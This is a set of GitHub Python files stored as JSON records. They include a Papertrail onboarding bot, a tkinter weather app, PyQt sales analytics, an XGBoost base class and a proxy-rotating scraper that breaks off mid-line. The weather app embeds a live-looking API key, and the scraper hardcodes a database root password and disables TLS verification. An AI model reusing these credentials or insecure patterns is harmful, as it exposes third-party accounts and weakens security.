1)\n solution.print_solution()\n assert solution.compute_shortest_paths() == expected_result\n\n def test_day11b_data(self):\n \"\"\"Result we got when we did the real solution\"\"\"\n solution = Day11PartB()\n res = solution(\"day_11/day11.txt\")\n assert res == 779032247216\n","repo_name":"RoelAdriaans/adventofcode","sub_path":"tests/adventofcode2023/test_day11_b.py","file_name":"test_day11_b.py","file_ext":"py","file_size_in_byte":714,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"4038413711","text":"from selenium import webdriver\nfrom selenium.webdriver.chrome.options import Options\nimport platform\nimport os\nimport time\n\nclass PapertrailProvider:\n LOGIN_URL=\"https://my.solarwinds.cloud/login?client_id=papertrail&redirect_uri=https%3A%2F%2Fpapertrailapp.com%2Faccount%2Fauth%2Fswicus%2Fcallback&response_type=code&scope=openid+swicus&state=q96tRqGAiNlq8AlqE0KfDuzT68CF%2FM%2Fu%2Bll%2B4LYy9NM%3D\"\n INVITE_URL=\"https://papertrailapp.com/members/new\"\n\n def __init__(self, email):\n self.email = email\n\n def onboard(self):\n driver = self.setup_driver()\n print(\"\\n- Start onboarding Papertrail\")\n\n try:\n self.sign_in(driver)\n self.invite_user(driver)\n self.check_invitation(driver)\n print(\"- Finish 
onboarding Papertrail\")\n except Exception as e:\n print(\"- Error \" + str(e))\n finally:\n driver.close()\n\n def sign_in(self, driver):\n driver.get(self.LOGIN_URL)\n print(\"- Sign In Papertrail\")\n \n email_input = driver.find_element_by_name(\"email\")\n email_input.send_keys(os.environ[\"PAPERTRAIL_USERNAME\"].strip())\n print(\"- Filling username\")\n\n password_input = driver.find_element_by_name(\"password\")\n password_input.send_keys(os.environ[\"PAPERTRAIL_PASSWORD\"].strip())\n print(\"- Filling password\")\n\n driver.find_element_by_xpath('//button[text()=\"Log in\"]').click()\n print(\"- Submit login form\")\n \n def invite_user(self, driver):\n self.delay(2)\n\n driver.get(self.INVITE_URL)\n print(\"- Visit invite page\")\n\n self.delay(2)\n \n email_input = driver.find_element_by_id(\"email\")\n email_input.send_keys(self.email)\n print(\"- Invite email \" + self.email)\n\n manage_member_checkbox = driver.find_element_by_name(\"members[][manage_members]\")\n manage_member_checkbox.click()\n print(\"- Untick 'Manage users and permissions' field\")\n\n self.delay(2)\n\n manage_billing_checkbox = driver.find_element_by_name(\"members[][manage_billing]\")\n manage_billing_checkbox.click()\n print(\"- Untick 'Change plans and payment' field\")\n\n receive_usage_emails_checkbox = driver.find_element_by_name(\"members[][receive_usage_emails]\")\n receive_usage_emails_checkbox.click()\n print(\"- Untick 'Usage' field\")\n\n receive_billing_emails_checkbox = driver.find_element_by_name(\"members[][receive_billing_emails]\")\n receive_billing_emails_checkbox.click()\n print(\"- Untick 'Billing' field\")\n\n driver.find_element_by_xpath('//button[contains(text(), \"Invite Member\")]').click()\n print(\"- Submit invite form\")\n\n def check_invitation(self, driver):\n self.delay(2)\n\n driver.find_element_by_xpath(\"//p[contains(text(), '\" + self.email + \" was sent a warm invitation')]\")\n print(\"- Check invitation success\")\n\n def delay(self, second):\n time.sleep(second)\n\n def setup_driver(self):\n # setup headless and chromedriver\n chrome_options = Options()\n chrome_options.add_argument('--headless')\n chrome_options.add_argument('--no-sandbox')\n chrome_options.add_argument('--disable-dev-shm-usage')\n chrome_driver = os.getcwd() + \"/chromedriver\" + self.driver_os()\n\n # setup selenium driver using chrome\n driver = webdriver.Chrome(chrome_driver, chrome_options=chrome_options)\n return driver\n\n def driver_os(self):\n os_type = platform.system()\n if os_type == \"Linux\":\n return \"_linux\"\n elif os_type == \"Darwin\":\n return \"_mac\"\n else:\n return \"\"\n","repo_name":"mekari-engineering/onboard-automation","sub_path":"papertrail_provider.py","file_name":"papertrail_provider.py","file_ext":"py","file_size_in_byte":3714,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"42709070828","text":"from tkinter import *\r\nimport tkinter as tk\r\nfrom geopy.geocoders import Nominatim\r\nfrom timezonefinder import TimezoneFinder\r\nfrom datetime import *\r\nimport requests\r\nimport pytz\r\nfrom PIL import Image, ImageTk\r\n\r\nroot = Tk()\r\nroot.title('VB Weather Forecasting App')\r\nroot.geometry('890x470+300+200')\r\nroot.configure(bg='#1974D2')\r\nroot.resizable(False,False)\r\n\r\ndef getWeather():\r\n city = textfield.get()\r\n\r\n geolocator = Nominatim(user_agent='geoapiExercises')\r\n location = geolocator.geocode(city)\r\n obj = TimezoneFinder()\r\n\r\n result = 
obj.timezone_at(lng=location.longitude, lat=location.latitude)\r\n\r\n timezone.config(text=result)\r\n long_lat.config(text=f'{round(location.latitude, 4)}°N, {round(location.longitude, 4)}°E')\r\n\r\n home = pytz.timezone(result)\r\n local_time = datetime.now(home)\r\n current_time = local_time.strftime('%I : %M %p')\r\n clock.config(text=current_time)\r\n\r\n #weather\r\n api = \"https://api.openweathermap.org/data/2.5/weather?lat=\"+str(location.latitude)+\"&lon=\"+str(location.longitude)+\"&units=metric&exclude=hourly&appid=6442700e8816c4110158c787eb10c317\"\r\n\r\n result = requests.get(api)\r\n \r\n if result:\r\n json = result.json()\r\n city = json['name']\r\n country = json['sys']\r\n temp = json['main']['temp']\r\n humidity = json['main']['humidity']\r\n pressure = json['main']['pressure']\r\n wind = json['wind']['speed']\r\n description = json['weather'][0]['main']\r\n final = [city, country, temp, humidity, pressure, wind, description]\r\n print(final)\r\n\r\n t.config(text=(temp, \"°C\"))\r\n h.config(text=(humidity, '%'))\r\n p.config(text=(pressure, 'hPa'))\r\n w.config(text=(wind, 'm/s'))\r\n d.config(text=description)\r\n\r\n #first cell\r\n firstdayimage = json['weather'][0]['icon']\r\n print(firstdayimage)\r\n \r\n img = (Image.open(f'icon/{firstdayimage}@2x.png'))\r\n photo1 = ImageTk.PhotoImage(img)\r\n firstimage.config(image=photo1)\r\n firstimage.image = photo1\r\n\r\n tempdaymin1 = json['main']['temp_min']\r\n tempdaymax1 = json['main']['temp_max']\r\n\r\n day1temp.config(text=f'Min: {tempdaymin1}\\n Max: {tempdaymax1}')\r\n\r\n #second cell\r\n seconddayimage = json['weather'][0]['icon']\r\n print(seconddayimage)\r\n\r\n img = (Image.open(f'icon/{seconddayimage}@2x.png'))\r\n resized_image = img.resize((40,40))\r\n photo2 = ImageTk.PhotoImage(resized_image)\r\n secondimage.config(image=photo2)\r\n secondimage.image = photo2\r\n\r\n tempdaymin2 = json['main']['temp_min']\r\n tempdaymax2 = json['main']['temp_max']\r\n\r\n day2temp.config(text=f'Min: {tempdaymin2}\\n Max: {tempdaymax2}')\r\n\r\n #third cell\r\n thirddayimage = json['weather'][0]['icon']\r\n print(thirddayimage)\r\n\r\n img = (Image.open(f'icon/{thirddayimage}@2x.png'))\r\n resized_image = img.resize((40,40))\r\n photo3 = ImageTk.PhotoImage(resized_image)\r\n thirdimage.config(image=photo3)\r\n thirdimage.image = photo3\r\n\r\n tempdaymin3 = json['main']['temp_min']\r\n tempdaymax3 = json['main']['temp_max']\r\n\r\n day3temp.config(text=f'Min: {tempdaymin3}\\n Max: {tempdaymax3}')\r\n\r\n #fourth cell\r\n fourthdayimage = json['weather'][0]['icon']\r\n print(fourthdayimage)\r\n\r\n img = (Image.open(f'icon/{fourthdayimage}@2x.png'))\r\n resized_image = img.resize((40,40))\r\n photo4 = ImageTk.PhotoImage(resized_image)\r\n fourthimage.config(image=photo4)\r\n fourthimage.image = photo4\r\n\r\n tempdaymin4 = json['main']['temp_min']\r\n tempdaymax4 = json['main']['temp_max']\r\n\r\n day4temp.config(text=f'Min: {tempdaymin4}\\n Max: {tempdaymax4}')\r\n\r\n #fifth cell\r\n fifthdayimage = json['weather'][0]['icon']\r\n print(fifthdayimage)\r\n\r\n img = (Image.open(f'icon/{fifthdayimage}@2x.png'))\r\n resized_image = img.resize((40,40))\r\n photo5 = ImageTk.PhotoImage(resized_image)\r\n fifthimage.config(image=photo5)\r\n fifthimage.image = photo5\r\n\r\n tempdaymin5 = json['main']['temp_min']\r\n tempdaymax5 = json['main']['temp_max']\r\n\r\n day5temp.config(text=f'Min: {tempdaymin5}\\n Max: {tempdaymax5}')\r\n\r\n #sixth cell\r\n sixthdayimage = json['weather'][0]['icon']\r\n 
print(sixthdayimage)\r\n\r\n img = (Image.open(f'icon/{sixthdayimage}@2x.png'))\r\n resized_image = img.resize((40,40))\r\n photo6 = ImageTk.PhotoImage(resized_image)\r\n sixthimage.config(image=photo6)\r\n sixthimage.image = photo6\r\n\r\n tempdaymin6 = json['main']['temp_min']\r\n tempdaymax6 = json['main']['temp_max']\r\n\r\n day6temp.config(text=f'Min: {tempdaymin6}\\n Max: {tempdaymax6}')\r\n\r\n #seventh cell\r\n seventhdayimage = json['weather'][0]['icon']\r\n print(seventhdayimage)\r\n\r\n img = (Image.open(f'icon/{seventhdayimage}@2x.png'))\r\n resized_image = img.resize((40,40))\r\n photo7 = ImageTk.PhotoImage(resized_image)\r\n seventhimage.config(image=photo7)\r\n seventhimage.image = photo7\r\n\r\n tempdaymin7 = json['main']['temp_min']\r\n tempdaymax7 = json['main']['temp_max']\r\n\r\n day7temp.config(text=f'Min: {tempdaymin7}\\n Max: {tempdaymax7}')\r\n\r\n #days\r\n first = datetime.now()\r\n day1.config(text=first.strftime('%A'))\r\n\r\n second = first+timedelta(days=1)\r\n day2.config(text=second.strftime('%A'))\r\n\r\n third = first+timedelta(days=2)\r\n day3.config(text=third.strftime('%A'))\r\n\r\n fourth = first+timedelta(days=3)\r\n day4.config(text=fourth.strftime('%A'))\r\n\r\n fifth = first+timedelta(days=4)\r\n day5.config(text=fifth.strftime('%A'))\r\n\r\n sixth = first+timedelta(days=5)\r\n day6.config(text=sixth.strftime('%A'))\r\n\r\n seventh = first+timedelta(days=6)\r\n day7.config(text=seventh.strftime('%A'))\r\n\r\n\r\n else:\r\n print(\"NO Content Found\")\r\n\r\n\r\n\r\n##icon\r\nimage_icon = PhotoImage(file='images/logo.png')\r\nroot.iconphoto(False, image_icon)\r\n\r\nRound_box = PhotoImage(file='images/Rounded Rectangle 1.png')\r\nLabel(root, image=Round_box, bg='#1974D2', height=120, width=180 ).place(x=50, y=110)\r\n\r\n#label\r\nlabel1 = Label(root, text='Temperature:', font=('Helvetica', 11), fg='white', bg='#203243')\r\nlabel1.place(x=60, y=120)\r\n\r\nlabel2 = Label(root, text='Humidity:', font=('Helvetica', 11), fg='white', bg='#203243')\r\nlabel2.place(x=60, y=140)\r\n\r\nlabel3 = Label(root, text='Pressure:', font=('Helvetica', 11), fg='white', bg='#203243')\r\nlabel3.place(x=60, y=160)\r\n\r\nlabel4 = Label(root, text='Wind Speed:', font=('Helvetica', 11), fg='white', bg='#203243')\r\nlabel4.place(x=60, y=180)\r\n\r\nlabel5 = Label(root, text='Description:', font=('Helvetica', 11), fg='white', bg='#203243')\r\nlabel5.place(x=60, y=200)\r\n\r\n##search box\r\nSearch_image = PhotoImage(file='images/Rounded Rectangle 3.png')\r\nmyimage = Label(image=Search_image, bg='#1974D2')\r\nmyimage.place(x=290, y=120)\r\n\r\nweat_image = PhotoImage(file='images/Layer 7.png')\r\nweather_image = Label(root, image=weat_image, bg='#203243')\r\nweather_image.place(x=310, y=127)\r\n\r\ntextfield = tk.Entry(root, justify='center', width=18, font=('poppins', 25, 'bold'), bg='#203243', border=0, fg='white')\r\ntextfield.place(x=380, y=130)\r\ntextfield.focus()\r\n\r\nSearch_icon = PhotoImage(file='images/Layer 6.png')\r\nmy_image_icon = Button(image=Search_icon, borderwidth=0, cursor='hand2', bg='#203243', command=getWeather)\r\nmy_image_icon.place(x=655, y=125)\r\n\r\n##Bottom Box\r\nframe = Frame(root, width=900, height=180, bg='#000000')\r\nframe.pack(side=BOTTOM)\r\n\r\n#bottom boxes\r\nfirstbox = PhotoImage(file='images/Rounded Rectangle 2.png')\r\nsecondbox = PhotoImage(file='images/Rounded Rectangle 2 copy.png')\r\n\r\nLabel(frame, image=firstbox, bg='#000000').place(x=30, y=20)\r\nLabel(frame, image=secondbox, bg='#000000').place(x=300, 
y=30)\r\nLabel(frame, image=secondbox, bg='#000000').place(x=400, y=30)\r\nLabel(frame, image=secondbox, bg='#000000').place(x=500, y=30)\r\nLabel(frame, image=secondbox, bg='#000000').place(x=600, y=30)\r\nLabel(frame, image=secondbox, bg='#000000').place(x=700, y=30)\r\nLabel(frame, image=secondbox, bg='#000000').place(x=800, y=30)\r\n\r\n#clock(time)\r\nclock = Label(root, font=('Helvetica', 30, 'bold'), fg='white', bg='#1974D2')\r\nclock.place(x=30, y=20)\r\n\r\n#timezone\r\ntimezone = Label(root, font=('Helvetica', 20), fg='white', bg='#1974D2')\r\ntimezone.place(x=700, y=20)\r\n\r\nlong_lat = Label(root, font=('Helvetica', 10), fg='white', bg='#1974D2')\r\nlong_lat.place(x=700, y=50)\r\n\r\n#thpwd\r\nt = Label(root, font=('Helvetica', 11), fg='white', bg='#203243')\r\nt.place(x=150, y=120)\r\nh = Label(root, font=('Helvetica', 11), fg='white', bg='#203243')\r\nh.place(x=150, y=140)\r\np = Label(root, font=('Helvetica', 11), fg='white', bg='#203243')\r\np.place(x=150, y=160)\r\nw = Label(root, font=('Helvetica', 11), fg='white', bg='#203243')\r\nw.place(x=150, y=180)\r\nd = Label(root, font=('Helvetica', 11), fg='white', bg='#203243')\r\nd.place(x=150, y=200)\r\n\r\n#first cell\r\nfirstframe = Frame(root, width=230, height=132, bg='#38ACEC')\r\nfirstframe.place(x=35, y=315)\r\n\r\nday1 = Label(firstframe, font='arial 20', bg='#38ACEC', fg='#000000')\r\nday1.place(x=100, y=5)\r\n\r\nfirstimage = Label(firstframe, bg='#38ACEC')\r\nfirstimage.place(x=1, y=15)\r\n\r\nday1temp = Label(firstframe, bg='#38ACEC', fg='#FFFF00', font='arial 15 bold')\r\nday1temp.place(x=100, y=50)\r\n\r\n#second cell\r\nsecondframe = Frame(root, width=70, height=115, bg='#38ACEC')\r\nsecondframe.place(x=305, y=325)\r\n\r\nday2 = Label(secondframe, bg='#38ACEC', fg='#000000')\r\nday2.place(x=10, y=5)\r\n\r\nsecondimage = Label(secondframe, bg='#38ACEC')\r\nsecondimage.place(x=7, y=20)\r\n\r\nday2temp = Label(secondframe, bg='#38ACEC', fg='#00008B', font='arial 10 bold')\r\nday2temp.place(x=-5, y=60)\r\n\r\n#third cell\r\nthirdframe = Frame(root, width=70, height=115, bg='#38ACEC')\r\nthirdframe.place(x=405, y=325)\r\n\r\nday3 = Label(thirdframe, bg='#38ACEC', fg='#000000')\r\nday3.place(x=10, y=5)\r\n\r\nthirdimage = Label(thirdframe, bg='#38ACEC')\r\nthirdimage.place(x=7, y=20)\r\n\r\nday3temp = Label(thirdframe, bg='#38ACEC', fg='#00008B', font='arial 10 bold')\r\nday3temp.place(x=-5, y=60)\r\n\r\n#fourth cell\r\nfourthframe = Frame(root, width=70, height=115, bg='#38ACEC')\r\nfourthframe.place(x=505, y=325)\r\n\r\nday4 = Label(fourthframe, bg='#38ACEC', fg='#000000')\r\nday4.place(x=10, y=5)\r\n\r\nfourthimage = Label(fourthframe, bg='#38ACEC')\r\nfourthimage.place(x=7, y=20)\r\n\r\nday4temp = Label(fourthframe, bg='#38ACEC', fg='#00008B', font='arial 10 bold')\r\nday4temp.place(x=-5, y=60)\r\n\r\n#fifth cell\r\nfifthframe = Frame(root, width=70, height=115, bg='#38ACEC')\r\nfifthframe.place(x=605, y=325)\r\n\r\nday5 = Label(fifthframe, bg='#38ACEC', fg='#000000')\r\nday5.place(x=10, y=5)\r\n\r\nfifthimage = Label(fifthframe, bg='#38ACEC')\r\nfifthimage.place(x=7, y=20)\r\n\r\nday5temp = Label(fifthframe, bg='#38ACEC', fg='#00008B', font='arial 10 bold')\r\nday5temp.place(x=-5, y=60)\r\n\r\n#sixth cell\r\nsixthframe = Frame(root, width=70, height=115, bg='#38ACEC')\r\nsixthframe.place(x=705, y=325)\r\n\r\nday6 = Label(sixthframe, bg='#38ACEC', fg='#000000')\r\nday6.place(x=10, y=5)\r\n\r\nsixthimage = Label(sixthframe, bg='#38ACEC')\r\nsixthimage.place(x=7, y=20)\r\n\r\nday6temp = Label(sixthframe, 
bg='#38ACEC', fg='#00008B', font='arial 10 bold')\r\nday6temp.place(x=-5, y=60)\r\n\r\n#seventh cell\r\nseventhframe = Frame(root, width=70, height=115, bg='#38ACEC')\r\nseventhframe.place(x=805, y=325)\r\n\r\nday7 = Label(seventhframe, bg='#38ACEC', fg='#000000')\r\nday7.place(x=10, y=5)\r\n\r\nseventhimage = Label(seventhframe, bg='#38ACEC')\r\nseventhimage.place(x=7, y=20)\r\n\r\nday7temp = Label(seventhframe, bg='#38ACEC', fg='#00008B', font='arial 10 bold')\r\nday7temp.place(x=-5, y=60)\r\n\r\nroot.mainloop()","repo_name":"varshasmile/gui_weather_forecasting_app","sub_path":"weather.py","file_name":"weather.py","file_ext":"py","file_size_in_byte":11794,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"12130210685","text":"#!/usr/bin/env python\n\nimport transformers.adapters.utils\nimport sys\n\ndef strify(x):\n if isinstance(x, list):\n return '|'.join(x)\n else:\n return str(x)\n\ndef geta(x, attr):\n if hasattr(x, attr):\n return strify(getattr(x, attr))\n else:\n return ''\n\nkeys = ['adapter_id', 'source', 'model_name', 'task', 'subtask']\nprint('\\t'.join(keys))\n\ndef adapter2str(a):\n return '\\t'.join(map(str, [geta(a, at) for at in keys]))\n\nfor a in transformers.adapters.utils.list_adapters():\n print(adapter2str(a))\n","repo_name":"kwchurch/gft","sub_path":"gft/gft_internals/huggingface_hub/list_adapters.py","file_name":"list_adapters.py","file_ext":"py","file_size_in_byte":537,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"16"} +{"seq_id":"19485289382","text":"\nimport sys\nsys.path.append('../')\nfrom pycore.tikzeng import *\n\n# defined your arch\narch = [\n to_head( '..' ),\n to_cor(),\n to_begin(),\n to_Conv_color_4(\"conv1\", 512, 64, offset=\"(0,0,0)\", to=\"(0,0,0)\", height=64, depth=64, width=2 ),\n\n to_end()\n ]\n\ndef main():\n namefile = str(sys.argv[0]).split('.')[0]\n to_generate(arch, namefile + '.tex' )\n\nif __name__ == '__main__':\n main()\n","repo_name":"Zhenhao-He/PlotNeuralNet-master-improve","sub_path":"pyexamples/text4.py","file_name":"text4.py","file_ext":"py","file_size_in_byte":407,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"38490327874","text":"import sys\n\nfrom PyQt5 import QtWidgets, uic\nfrom wb_an import WbAnalits\nfrom ozon_an import OzonAnalits\nfrom table_analit import analits_month, analits_wb\nfrom month_an import MonthAnalits\n\n\nclass HomeScreen(QtWidgets.QMainWindow):\n def __init__(self):\n super().__init__()\n self.initUI()\n\n def initUI(self):\n uic.loadUi('uis/home2.ui', self)\n self.pushButton.clicked.connect(self.anal_wb_week)\n self.pushButton_10.clicked.connect(self.anal_ozon_week)\n self.pushButton_3.clicked.connect(self.openWB)\n self.pushButton_4.clicked.connect(self.openOzon)\n self.pushButton_2.clicked.connect(self.exit)\n self.pushButton_5.clicked.connect(self.to_month_res)\n self.routsOzon = []\n self.routsWB = []\n\n def anal_wb_week(self):\n route = QtWidgets.QFileDialog.getOpenFileName(self, 'Open File', '/', \"Excel (*.xls *.xlsx)\")[0]\n if route:\n try:\n analits_wb(route)\n except:\n self.label_6.setText('
    Ошибка данных
    ')\n self.pushButton.setText('Открыть файлы ❌')\n\n else:\n self.pushButton.setText('Открыть файлы')\n self.label_6.setText('')\n self.st = WbAnalits(route, self)\n self.st.move(self.x() - 230, self.y() - 150)\n self.st.show()\n self.hide()\n\n def anal_ozon_week(self):\n route = QtWidgets.QFileDialog.getOpenFileName(self, 'Open File', '/', \"Excel (*.xls *.xlsx)\")[0]\n if route:\n self.st = OzonAnalits(route, self)\n self.st.move(self.x() - 230, self.y() - 150)\n self.st.show()\n self.hide()\n\n def openWB(self):\n self.routsWB = QtWidgets.QFileDialog.getOpenFileNames(self, 'Open File', 'results_wb/', \"Excel (*.xls *.xlsx)\")[\n 0]\n try:\n a = 5 / len(self.routsWB)\n for route in self.routsWB:\n analits_month(route)\n except:\n self.label_4.setText('
    Ошибка данных
    ')\n self.pushButton_3.setText('Открыть файлы ❌')\n self.pushButton_5.setEnabled(False)\n else:\n self.label_4.setText(f'Выбрано {len(self.routsWB)} файла(-ов)')\n self.pushButton_3.setText('Открыть файлы ✅')\n if self.pushButton_4.text() == 'Открыть файлы ✅':\n self.pushButton_5.setEnabled(True)\n\n def openOzon(self):\n self.routsOzon = \\\n QtWidgets.QFileDialog.getOpenFileNames(self, 'Open File', 'results_ozon/', \"Excel (*.xls *.xlsx)\")[0]\n try:\n a = 5 / len(self.routsOzon)\n for route in self.routsOzon:\n analits_month(route)\n except:\n self.label_5.setText('
    Ошибка данных
    ')\n self.pushButton_4.setText('Открыть файлы ❌')\n self.pushButton_5.setEnabled(False)\n else:\n self.label_5.setText(f'Выбрано {len(self.routsOzon)} файла(-ов)')\n self.pushButton_4.setText('Открыть файлы ✅')\n if self.pushButton_3.text() == 'Открыть файлы ✅':\n self.pushButton_5.setEnabled(True)\n\n def to_month_res(self):\n self.st = MonthAnalits(self.routsWB, self.routsOzon, self)\n self.st.move(self.x() - 230, self.y() - 150)\n self.st.show()\n self.label_4.setText('')\n self.label_5.setText('')\n self.pushButton_3.setText('Открыть файлы')\n self.pushButton_4.setText('Открыть файлы')\n self.pushButton_5.setEnabled(False)\n self.routsWB = []\n self.routsOzon = []\n self.hide()\n\n def exit(self):\n exit(sys.argv)\n","repo_name":"ttema4/WbOzonAnalitics","sub_path":"home.py","file_name":"home.py","file_ext":"py","file_size_in_byte":3971,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"35654806944","text":"class Animal():\n def __init__(self, name, weight, color, sex):\n self.__name = name\n self.__weight = weight\n self.__color = color\n self.__sex = sex\n def get_animal(self):\n print(f'Name: {self.__name}, Color: {self.__color}, Sex: {self.__sex}, Weight: {self.__weight}, Legs: {self.legs}')\n\n\nclass Horse(Animal):\n legs = 'Hard'\n\n\nclass Dog(Animal):\n legs = 'Soft'\n\n\nclass Cat(Animal):\n legs = 'Furry'\n\n\nhorse = Horse('Bolt', 250, 'Brown', 'Male')\ndog = Dog('Breety', 25, 'Black', 'Female')\ncat = Cat('Rich', 6, 'Multicolor', 'Male')\n\nprint(horse.get_animal(), dog.get_animal(), cat.get_animal())","repo_name":"NightKiller152/Python_examples","sub_path":"SimplePython/exercise.py","file_name":"exercise.py","file_ext":"py","file_size_in_byte":642,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"4501736621","text":"import os\n\nimport numpy as np\nimport pandas as pd\n\nfrom algorithm.core.data_io import CsvReader, ValidationNumpyDataset\nfrom algorithm.core.encryption_param import get_encryption_param\nfrom algorithm.core.tree.tree_param import XGBTreeParam\nfrom algorithm.framework.vertical.vertical_model_base import VerticalModelBase\nfrom common.utils.logger import logger\n\n\nclass VerticalXgboostBase(VerticalModelBase):\n def __init__(self, train_conf: dict, is_label_trainer: bool = False, *args, **kwargs):\n super().__init__(train_conf)\n self.train_conf = train_conf\n self.train_features, self.train_label = None, None\n self.val_features, self.val_label = None, None\n self.xgb_config = None\n self.is_label_trainer = is_label_trainer\n self.feature_importances_ = {}\n self.__init_xgb_config()\n self.__init_data()\n self.__convert_to_binned_data()\n\n def __init_data(self) -> None:\n \"\"\" Init data, include features and label.\n\n Returns: None\n\n \"\"\"\n train_reader: CsvReader = self.__load_data(self.input_trainset)\n validation_reader: CsvReader = self.__load_data(self.input_valset)\n if self.is_label_trainer:\n self.train_features, self.train_label = train_reader.features(type=\"pandas.dataframe\"), train_reader.label()\n self.val_features, self.val_label = validation_reader.features(type=\"pandas.dataframe\"), validation_reader.label()\n self.train_feature_name, self.valid_feature_name = train_reader.feature_names(), validation_reader.feature_names()\n else:\n self.train_features = train_reader.features(type=\"pandas.dataframe\")\n self.val_features = validation_reader.features(type=\"pandas.dataframe\")\n\n self.train_ids = 
train_reader.ids\n self.val_ids = validation_reader.ids\n\n self.train_features.replace({np.nan: 0, self.xgb_config.missing_value: 0}, inplace=True)\n self.val_features.replace({np.nan: 0, self.xgb_config.missing_value: 0}, inplace=True)\n \n self.bs = self.train_params.get(\"validation_batch_size\")\n self.train_dataset = ValidationNumpyDataset(batch_size=self.bs, dataset=self.train_features.to_numpy().astype(np.float32),\n label=self.train_label)\n self.val_dataset = ValidationNumpyDataset(batch_size=self.bs, dataset=self.val_features.to_numpy().astype(np.float32), \n label=self.val_label)\n \n def __convert_to_binned_data(self):\n out = pd.Series(self.train_features.columns).apply(\n lambda x: pd.cut(self.train_features[x], bins=self.xgb_config.num_bins, retbins=True, labels=range(self.xgb_config.num_bins))\n )\n \n if self.xgb_config.num_bins <= 256:\n dtype = np.uint8\n elif self.xgb_config.num_bins <= 1e16:\n dtype = np.uint16\n else:\n dtype = np.uint32\n \n self.train_features = pd.DataFrame([out[i][0] for i in range(len(out))], dtype=dtype).T\n self.split_points = [out[i][1][1:-1] for i in range(len(out))]\n \n def __load_data(self, config) -> CsvReader:\n \"\"\" Load data from dataset config.\n\n Args:\n argv: Dataset config.\n\n Returns: CsvReader.\n\n \"\"\"\n if len(config) > 1:\n logger.warning(\"More than one dataset is not supported.\")\n \n config = config[0]\n if config[\"type\"] == \"csv\":\n data_reader = CsvReader(path=os.path.join(config[\"path\"],config[\"name\"]), has_id=config[\"has_id\"], has_label=config[\"has_label\"])\n else:\n raise NotImplementedError(\"Dataset type {} is not supported.\".format(config[\"type\"]))\n return data_reader\n\n def __init_xgb_config(self) -> None:\n \"\"\" Init xgboost config.\n\n Returns: None\n\n \"\"\"\n default_config = self.train_info.get(\"params\")\n encryption_method = list(default_config.get(\"encryption_params\").keys())[0]\n encryption_param = default_config.get(\"encryption_params\")[encryption_method]\n\n self.xgb_config = XGBTreeParam(task_type=default_config.get(\"task_type\"),\n loss_param=default_config.get(\"lossfunc_config\"), #(\"BCEWithLogits\"),\n num_trees=default_config.get(\"num_trees\"),\n learning_rate=default_config.get(\"learning_rate\"),\n gamma=default_config.get(\"gamma\"),\n lambda_=default_config.get(\"lambda_\"),\n max_depth=default_config.get(\"max_depth\"),\n num_bins=default_config.get(\"num_bins\"),\n min_split_gain=default_config.get(\"min_split_gain\"),\n min_sample_split=default_config.get(\"min_sample_split\"),\n min_leaf_node=default_config.get(\"min_leaf_node\"),\n feature_importance_type=default_config.get(\"feature_importance_type\"),\n run_goss=default_config.get(\"run_goss\"),\n top_rate=default_config.get(\"top_rate\"),\n other_rate=default_config.get(\"other_rate\"),\n validation_freqs=1,\n metrics=default_config.get(\"metric_config\"),\n early_stopping_param=default_config.get(\"early_stopping_params\"),\n encryption_param=get_encryption_param(encryption_method, encryption_param),\n subsample_feature_rate=default_config.get(\"subsample_feature_rate\"),\n missing_value=float('inf'),\n max_num_cores=default_config.get(\"max_num_cores\"),\n col_batch=default_config.get(\"col_batch\"),\n row_batch=default_config.get(\"row_batch\"))\n","repo_name":"OneTarnished/XFL","sub_path":"python/algorithm/framework/vertical/xgboost/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":6250,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"16"} 
+{"seq_id":"28020602988","text":"import threading\nimport asyncio\n\n@asyncio.coroutine\ndef hello(x):\n print('Hello world!%s (%s)' % (x ,threading.currentThread()))\n yield print('----')\n print('Hello again!%s (%s)' % (x, threading.currentThread()))\n\nloop = asyncio.get_event_loop()\ntasks = [hello(s) for s in range(5)]\nloop.run_until_complete(asyncio.wait(tasks))\nloop.close()\nasyncio.open_connection()","repo_name":"MXblade/PythonStudy","sub_path":"ThreadRel/asynciotest.py","file_name":"asynciotest.py","file_ext":"py","file_size_in_byte":376,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"38117598593","text":"import json\nimport re\nimport time\nimport pymysql\nimport requests\nrequests.packages.urllib3.disable_warnings()\n\ndef read_proxys():\n db = pymysql.connect(\n host=\"localhost\",\n port=3306,\n user=\"root\",\n password=\"myron123\",\n database=\"crawel\",\n )\n cursor = db.cursor()\n sql = \"select distinct target from proxy;\"\n cursor.execute(sql)\n proxys = cursor.fetchall()\n db.commit()\n return proxys\nproxy_list_bak = []\ndef proxy_list():\n proxys = read_proxys()\n proxy_list = []\n for i in range(0,len(proxys)-1):\n try:\n proxy = proxys[i][0]\n proxy = eval(proxy)\n print(proxy)\n headers = {\n \"User-Agent\": 'Mozilla/5.0 (Windows NT 6.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',\n }\n time.sleep(2.5)\n p = requests.get('http://icanhazip.com', headers=headers, proxies=proxy, timeout=30)\n if p.status_code == 200:\n proxy = {'{}'.format(proxy[0]): '{}'.format(proxy[1])}\n print(proxy)\n tg = list(proxy.values())[0].split(':')[1][2:].split('.')\n tg = str(tg[0]) + \".\" + str(tg[1]) + \".\" + str(tg[2])\n print(tg)\n if tg in p.text.strip():\n proxy_list.append(proxy)\n proxy_list_bak.append(proxy)\n print(proxy_list)\n except Exception as e:\n print(e)\n return proxy_list\n# print(proxy_list())\n\ndef crawel_one_page(url):\n proxy = {'http': 'http://51.158.186.242:8811'}\n headers = {\n \"User-Agent\": 'Mozilla/5.0 (Windows NT 6.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',\n 'Connection': 'close'\n }\n res = requests.get(url, headers=headers, verify=False,\n allow_redirects=False, timeout=15,proxies 